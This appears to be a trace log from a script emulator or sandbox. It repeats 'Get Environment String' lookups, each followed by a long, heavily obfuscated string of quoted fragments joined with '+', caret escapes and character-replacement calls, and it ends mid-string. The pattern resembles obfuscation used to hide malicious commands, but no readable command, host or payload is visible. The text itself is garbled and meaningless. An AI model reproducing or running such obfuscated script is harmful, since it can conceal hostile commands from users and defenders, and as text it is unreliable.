('+'Pjy)'+')').Rek7y3p67yjU6wL1'967'6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#H).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]PjyjUn4axH).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&gYse%gYgY6jUI/`6KwL,%zwLhPjgY1gZgYF3pbf6RI7K3QI93pe8 e:XbGC7y).7y6TdvwL.InF3pbfPjQIwL7yjU6XmuQI6njU.IqF3pbfN7yPjQIes7yjU6RZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y).F3pbf6Td3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]67yjU6%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjU6PjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjU6XmsGC7yye,{H6xd4axH6xd4ax5Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYo637Z/Tgo True 1
Fn
Get Environment String name = }],$, result_out = seGC7ygYgYsvTd]F3pbf6K.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'63pgYF3p'+']'+'gYqF3pbfN'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'7K'+'3737-%'+'`k7yegY-7Ks'+'sem3QI93p`'+'qF3pbfN6megY967jh`sGC7yem.jU]6'+'4'+'Zng967['+'F3pbfbfk7yuuQI37s'+'6KF3p]gYjh`sGC7ye'+'m.'+'jU]64Zn'+'g.u'+'ZGC7ym6k7y11F3p]gYqF3pbfNeGC7y.W'+'e3QI97yjU6'+'3pZenGC7y).'+'Pjk7yenRe637196'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZm6g'+'es4Wx.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'g6GC7y4WxuQI7ysK_X.'+'k7yng967'+'))['+'F3pbfbfk7yuuQI'+'mQI6KF3p]gYu`'+'GC7y'+'e{PjygY'+'4WxjUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]e6,%zwLh1'+'F3pbf'+'bf'+'k7yuuQI7gYZn1 ..H'+'4Wx('+'))\F3pbfbfk7yuuQI'+'GC7y'+'GC7y6KF3pbfbfk7yuuQI37s.6wLe'+'GC7yGC7yyZ7e3p1F3pbfbfk7yuuQI76xd'+'F3pbf'+'bfk7yuuQI_'+')[F3pbfbfk7yuuQImQI'+'{F3pbfbfk7yuuQI'+'_:H4Wxiy+F3pbfbfk7yuuQI7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3pbfbf'+'k7yuuQIGC7yGC7y.u-3QI96n37jUn5):jUnbf)-3QI9X]'+'1F3pbfbfk7yuuQIGC7y'+'GC7y.6wLgY-3QI96n37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 7Kjh7yjU6II.'+'6wLeGC7yjh'+'GC7y]Zng1F3pbfbf'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3p67yjU6wL1'967'6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#H).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]PjyjUn4WxH).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&gYse%gYgY6jUI/`6KwL,%zwLhPjgY1gZgYF3pbf6RI7K3QI93pe8 e:XbGC7y).7y6TdvwL.InF3pbfPjQIwL7yjU6XmuQI6njU.IqF3pbfN7yPjQIes7yjU6RZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y).F3pbf6Td3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]67yjU6%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjU6PjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjU6XmsGC7yye,{H6xd4WxH6xd4Wx5Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYo637Z/Tgo True 1
Fn
Get Environment String name = \[, result_out = seGC7ygYgYsvTd]F3pbfaK.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'a3pgYF3p'+']'+'gYqF3pbfN'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'7K'+'3737-%'+'`k7yegY-7Ks'+'sem3QI93p`'+'qF3pbfNamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'F3pbfbfk7yuuQI37s'+'aKF3p]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11F3p]gYqF3pbfNeGC7y.W'+'e3QI97yjUa'+'3pZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZmag'+'es4Wx.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'gaGC7y4WxuQI7ysK_X.'+'k7yng9a7'+'))['+'F3pbfbfk7yuuQI'+'mQIaKF3p]gYu`'+'GC7y'+'e{PjygY'+'4WxjUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]ea,%zwLh1'+'F3pbf'+'bf'+'k7yuuQI7gYZn1 ..H'+'4Wx('+'))\F3pbfbfk7yuuQI'+'GC7y'+'GC7yaKF3pbfbfk7yuuQI37s.awLe'+'GC7yGC7yyZ7e3p1F3pbfbfk7yuuQI7axd'+'F3pbf'+'bfk7yuuQI_'+')[F3pbfbfk7yuuQImQI'+'{F3pbfbfk7yuuQI'+'_:H4Wxiy+F3pbfbfk7yuuQI7PjyaK1{maGC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3pbfbf'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5):jUnbf)-3QI9X]'+'1F3pbfbfk7yuuQIGC7y'+'GC7y.awLgY-3QI9an37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 7Kjh7yjUaII.'+'awLeGC7yjh'+'GC7y]Zng1F3pbfbf'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3pa7yjUawL1'9a7'axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#H).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]Pjy9iy+{7yjUa%zwLh7K]Pjyiy#+{7yjUa%zwLh7K]PjyjUn bf)axd{s%RInawLPjy{7yjUa%zwLh7K]PjyjUn4WxH).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]PjyjUnjUniy+{7yjUa%zwLh7K]Pjy5H+{7yjUa%zwLh7K]PjyiyjUn)axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#bf))^&^&gYse%gYgYajUI/`aKwL,%zwLhPjgY1gZgYF3pbfaRI7K3QI93pe8 e:XbGC7y).7yaTdvwL.InF3pbfPjQIwL7yjUaXmuQIanjU.IqF3pbfN7yPjQIes7yjUaRZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y).F3pbfaTd3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]a7yjUa%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjUaPjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjUaXmsGC7yye,{Haxd4WxHaxd4Wx5Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYoa37Z/Tgo True 1
Fn
Get Environment String name = `]$, result_out = seGC7ygYgYsvTd]F3pbfaK.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'a3pgYF3p'+']'+'gYqF3pbfN'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'7K'+'3737-%'+'`k7yegY-7Ks'+'sem3QI93p`'+'qF3pbfNamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'F3pbfbfk7yuuQI37s'+'aKF3p]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11F3p]gYqF3pbfNeGC7y.W'+'e3QI97yjUa'+'3pZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'F3pbfbfk7yuuQI'+'mQIaKF3p]gYu`'+'GC7y'+'e{PjygY'+'2jUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]ea,%zwLh1'+'F3pbf'+'bf'+'k7yuuQI7gYZn1 ..H'+'2('+'))\F3pbfbfk7yuuQI'+'GC7y'+'GC7yaKF3pbfbfk7yuuQI37s.awLe'+'GC7yGC7yyZ7e3p1F3pbfbfk7yuuQI7axd'+'F3pbf'+'bfk7yuuQI_'+')[F3pbfbfk7yuuQImQI'+'{F3pbfbfk7yuuQI'+'_:H2iy+F3pbfbfk7yuuQI7PjyaK1{maGC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3pbfbf'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5):jUnbf)-3QI9X]'+'1F3pbfbfk7yuuQIGC7y'+'GC7y.awLgY-3QI9an37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 7Kjh7yjUaII.'+'awLeGC7yjh'+'GC7y]Zng1F3pbfbf'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3pa7yjUawL1'9a7'axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#H).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]Pjy9iy+{7yjUa%zwLh7K]Pjyiy#+{7yjUa%zwLh7K]PjyjUn bf)axd{s%RInawLPjy{7yjUa%zwLh7K]PjyjUn2H).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]PjyjUnjUniy+{7yjUa%zwLh7K]Pjy5H+{7yjUa%zwLh7K]PjyiyjUn)axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#bf))^&^&gYse%gYgYajUI/`aKwL,%zwLhPjgY1gZgYF3pbfaRI7K3QI93pe8 e:XbGC7y).7yaTdvwL.InF3pbfPjQIwL7yjUaXmuQIanjU.IqF3pbfN7yPjQIes7yjUaRZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y).F3pbfaTd3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]a7yjUa%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjUaPjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYoa37Z/Tgo True 1
Fn
Get Environment String name = `-$, result_out = seGC7ygYgYsvTd]F3p6aK.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'a3pgYF3p'+']'+'gYqF3p6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'7K'+'3737-%'+'`k7yegY-7Ks'+'sem3QI93p`'+'qF3p6NamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'F3p66k7yuuQI37s'+'aKF3p]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11F3p]gYqF3p6NeGC7y.W'+'e3QI97yjUa'+'3pZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'F3p66k7yuuQI'+'mQIaKF3p]gYu`'+'GC7y'+'e{PjygY'+'2jUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]ea,%zwLh1'+'F3p6'+'6'+'k7yuuQI7gYZn1 ..H'+'2('+'))\F3p66k7yuuQI'+'GC7y'+'GC7yaKF3p66k7yuuQI37s.awLe'+'GC7yGC7yyZ7e3p1F3p66k7yuuQI7axd'+'F3p6'+'6k7yuuQI_'+')[F3p66k7yuuQImQI'+'{F3p66k7yuuQI'+'_:H2iy+F3p66k7yuuQI7PjyaK1{maGC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3p66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5):jUn6)-3QI9X]'+'1F3p66k7yuuQIGC7y'+'GC7y.awLgY-3QI9an37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 7Kjh7yjUaII.'+'awLeGC7yjh'+'GC7y]Zng1F3p66'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3pa7yjUawL1'9a7'axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#H).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]Pjy9iy+{7yjUa%zwLh7K]Pjyiy#+{7yjUa%zwLh7K]PjyjUn 6)axd{s%RInawLPjy{7yjUa%zwLh7K]PjyjUn2H).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]PjyjUnjUniy+{7yjUa%zwLh7K]Pjy5H+{7yjUa%zwLh7K]PjyiyjUn)axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#6))^&^&gYse%gYgYajUI/`aKwL,%zwLhPjgY1gZgYF3p6aRI7K3QI93pe8 e:XbGC7y).7yaTdvwL.InF3p6PjQIwL7yjUaXmuQIanjU.IqF3p6N7yPjQIes7yjUaRZGC7yy%11TdjhgYeqF3p6N7y8 s3Td]7y).F3p6aTd3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3p6NZqF3p6N%wL]a7yjUa%IgYgY-qF3p6NX3pPjgY-4ZqF3p6NgY%zwLhI3737engY-e7e,v%IPjqF3p6Nk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjUaPjmuQI7KqF3p6N37gYgYgYgYgY^^^^^^^&1gY@eqF3p6N7y8 7yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYoa37Z/Tgo True 1
Fn
Get Environment String name = [$@+, result_out = seGC7ygYgYsvTd]F3p6aK.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'a3pgYF3p'+']'+'gYqF3p6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7yegY-As'+'sem3QI93p`'+'qF3p6NamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'F3p66k7yuuQI37s'+'aKF3p]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11F3p]gYqF3p6NeGC7y.W'+'e3QI97yjUa'+'3pZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'F3p66k7yuuQI'+'mQIaKF3p]gYu`'+'GC7y'+'e{PjygY'+'2jUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]ea,%zwLh1'+'F3p6'+'6'+'k7yuuQI7gYZn1 ..H'+'2('+'))\F3p66k7yuuQI'+'GC7y'+'GC7yaKF3p66k7yuuQI37s.awLe'+'GC7yGC7yyZ7e3p1F3p66k7yuuQI7axd'+'F3p6'+'6k7yuuQI_'+')[F3p66k7yuuQImQI'+'{F3p66k7yuuQI'+'_:H2iy+F3p66k7yuuQI7PjyaK1{maGC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3p66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5):jUn6)-3QI9X]'+'1F3p66k7yuuQIGC7y'+'GC7y.awLgY-3QI9an37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 Ajh7yjUaII.'+'awLeGC7yjh'+'GC7y]Zng1F3p66'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3pa7yjUawL1'9a7'axd{s%RInawLPjy{7yjUa%zwLhA]Pjy#H).Rek7y3pa7yjUawL11{7yjUa%zwLhA]Pjy9iy+{7yjUa%zwLhA]Pjyiy#+{7yjUa%zwLhA]PjyjUn 6)axd{s%RInawLPjy{7yjUa%zwLhA]PjyjUn2H).Rek7y3pa7yjUawL11{7yjUa%zwLhA]PjyjUnjUniy+{7yjUa%zwLhA]Pjy5H+{7yjUa%zwLhA]PjyiyjUn)axd{s%RInawLPjy{7yjUa%zwLhA]Pjy#6))^&^&gYse%gYgYajUI/`aKwL,%zwLhPjgY1gZgYF3p6aRIA3QI93pe8 e:XbGC7y).7yaTdvwL.InF3p6PjQIwL7yjUaXmuQIanjU.IqF3p6N7yPjQIes7yjUaRZGC7yy%11TdjhgYeqF3p6N7y8 s3Td]7y).F3p6aTd3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3p6NZqF3p6N%wL]a7yjUa%IgYgY-qF3p6NX3pPjgY-4ZqF3p6NgY%zwLhI3737engY-e7e,v%IPjqF3p6Nk7yPjTdI,gY3QI9`GC7yyAjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjUaPjmuQIAqF3p6N37gYgYgYgYgY^^^^^^^&1gY@eqF3p6N7y8 7yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYoa37Z/Tgo True 1
Fn
Get Environment String name = @-, result_out = seGC7ygYgYsvTd]Fl6aK.gY1gY@sheZ7yelTdI37{jUnPjy+@s%zwLhwLTdlI37{jUn#Pjy+'Xb')gY11's'+'algYFl'+']'+'gYqFl6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7yegY-As'+'sem3QI9l`'+'qFl6NamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11Fl]gYqFl6NeGC7y.W'+'e3QI97yjUa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g9 ,gFljUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl]gYu`'+'GC7y'+'e{PjygY'+'2jUnH [1 .'+'.H)3QI9'+'jh'+'heZo\FlX]ea,%zwLh1'+'Fl6'+'6'+'k7yuuQI7gYZn1 ..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.awLe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_:H2iy+Fl66k7yuuQI7PjyaK1{maGC7y%zwLhPjy8 8 zwLh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5):jUn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.awLgY-3QI9an37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 Ajh7yjUaII.'+'awLeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7yla7yjUawL1'9a7'axd{s%RInawLPjy{7yjUa%zwLhA]Pjy#H).Rek7yla7yjUawL11{7yjUa%zwLhA]Pjy9iy+{7yjUa%zwLhA]Pjyiy#+{7yjUa%zwLhA]PjyjUn 6)axd{s%RInawLPjy{7yjUa%zwLhA]PjyjUn2H).Rek7yla7yjUawL11{7yjUa%zwLhA]PjyjUnjUniy+{7yjUa%zwLhA]Pjy5H+{7yjUa%zwLhA]PjyiyjUn)axd{s%RInawLPjy{7yjUa%zwLhA]Pjy#6))^&^&gYse%gYgYajUI/`aKwL,%zwLhPjgY1gZgYFl6aRIA3QI9le8 e:XbGC7y).7yaTdvwL.InFl6PjQIwL7yjUaXmuQIanjU.IqFl6N7yPjQIes7yjUaRZGC7yy%11TdjhgYeqFl6N7y8 s3Td]7y).Fl6aTd3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywLlTdgYgY-nXqFl6NZqFl6N%wL]a7yjUa%IgYgY-qFl6NXlPjgY-4ZqFl6NgY%zwLhI3737engY-e7e,v%IPjqFl6Nk7yPjTdI,gY3QI9`GC7yyAjhjhgYgY-nPjGC7yy]PjzwLhIlegYgY-7yjUaPjmuQIAqFl6N37gYgYgYgYgY^^^^^^^&1gY@eqFl6N7y8 7yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYoa37Z/Tgo True 1
Fn
Get Environment String name = ~`*?, result_out = seGC7ygYgYsvTd]Fl6aK.gY1gY@sheZ7yelTdI37{jUnPjy+@s%zwLhwLTdlI37{jUn#Pjy+'Xb')gY11's'+'algYFl'+']'+'gYqFl6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7yegY-As'+'sem3QI9l`'+'qFl6NamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11Fl]gYqFl6NeGC7y.W'+'e3QI97yjUa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g9 ,gFljUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl]gYu`'+'GC7y'+'e{PjygY'+'2jUnH [1 .'+'.H)3QI9'+'jh'+'heZo\FlX]ea,%zwLh1'+'Fl6'+'6'+'k7yuuQI7gYZn1 ..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.awLe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_*H2iy+Fl66k7yuuQI7PjyaK1{maGC7y%zwLhPjy8 8 zwLh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5)*jUn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.awLgY-3QI9an37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 Ajh7yjUaII.'+'awLeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7yla7yjUawL1'9a7'axd{s%RInawLPjy{7yjUa%zwLhA]Pjy#H).Rek7yla7yjUawL11{7yjUa%zwLhA]Pjy9iy+{7yjUa%zwLhA]Pjyiy#+{7yjUa%zwLhA]PjyjUn 6)axd{s%RInawLPjy{7yjUa%zwLhA]PjyjUn2H).Rek7yla7yjUawL11{7yjUa%zwLhA]PjyjUnjUniy+{7yjUa%zwLhA]Pjy5H+{7yjUa%zwLhA]PjyiyjUn)axd{s%RInawLPjy{7yjUa%zwLhA]Pjy#6))^&^&gYse%gYgYajUI/`aKwL,%zwLhPjgY1gZgYFl6aRIA3QI9le8 e*XbGC7y).7yaTdvwL.InFl6PjQIwL7yjUaXmuQIanjU.IqFl6N7yPjQIes7yjUaRZGC7yy%11TdjhgYeqFl6N7y8 s3Td]7y).Fl6aTd3egYgY)gYgY^^^|GC7yyPj4wLRsheZ7ywLlTdgYgY-nXqFl6NZqFl6N%wL]a7yjUa%IgYgY-qFl6NXlPjgY-4ZqFl6NgY%zwLhI3737engY-e7e,v%IPjqFl6Nk7yPjTdI,gY3QI9`GC7yyAjhjhgYgY-nPjGC7yy]PjzwLhIlegYgY-7yjUaPjmuQIAqFl6N37gYgYgYgYgY^^^^^^^&1gY@eqFl6N7y8 7yjUaXmsGC7yye,{Haxd2Haxd25Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYoa37Z/Tgo True 1
Fn
Get Environment String name = #;, result_out = seGC7ygYgYsvTd]Fl6aK.gY1gY@sheZ7yelTdI37{jUnPjy+@s%zEhETdlI37{jUn#Pjy+'Xb')gY11's'+'algYFl'+']'+'gYqFl6N'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'A'+'3737-%'+'`k7yegY-As'+'sem3QI9l`'+'qFl6NamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'Fl66k7yuuQI37s'+'aKFl]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11Fl]gYqFl6NeGC7y.W'+'e3QI97yjUa'+'lZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zEhGC7yGC7yk7ys8 ,g,gZmag'+'es2.Zmg3QI9X'+'7.,X'+'m,g9 ,gFljUn,g'+'gaGC7y2uQI7ysK_X.'+'k7yng9a7'+'))['+'Fl66k7yuuQI'+'mQIaKFl]gYu`'+'GC7y'+'e{PjygY'+'2jUnH [1 .'+'.H)3QI9'+'jh'+'heZo\FlX]ea,%zEh1'+'Fl6'+'6'+'k7yuuQI7gYZn1 ..H'+'2('+'))\Fl66k7yuuQI'+'GC7y'+'GC7yaKFl66k7yuuQI37s.aEe'+'GC7yGC7yyZ7el1Fl66k7yuuQI7axd'+'Fl6'+'6k7yuuQI_'+')[Fl66k7yuuQImQI'+'{Fl66k7yuuQI'+'_*H2iy+Fl66k7yuuQI7PjyaK1{maGC7y%zEhPjy8 8 zEh'+'lX'+'X]11Fl66'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5)*jUn6)-3QI9X]'+'1Fl66k7yuuQIGC7y'+'GC7y.aEgY-3QI9an37gYjUn5))}'+'}['+'I'+'EXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.E'+'n,X37Zn'+'g'+'Pjy8 8 Ajh7yjUaII.'+'aEeGC7yjh'+'GC7y]Zng1Fl66'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7yla7yjUaE1'9a7'axd{s%RInaEPjy{7yjUa%zEhA]Pjy#H).Rek7yla7yjUaE11{7yjUa%zEhA]Pjy9iy+{7yjUa%zEhA]Pjyiy#+{7yjUa%zEhA]PjyjUn 6)axd{s%RInaEPjy{7yjUa%zEhA]PjyjUn2H).Rek7yla7yjUaE11{7yjUa%zEhA]PjyjUnjUniy+{7yjUa%zEhA]Pjy5H+{7yjUa%zEhA]PjyiyjUn)axd{s%RInaEPjy{7yjUa%zEhA]Pjy#6))^&^&gYse%gYgYajUI/`aKE,%zEhPjgY1gZgYFl6aRIA3QI9le8 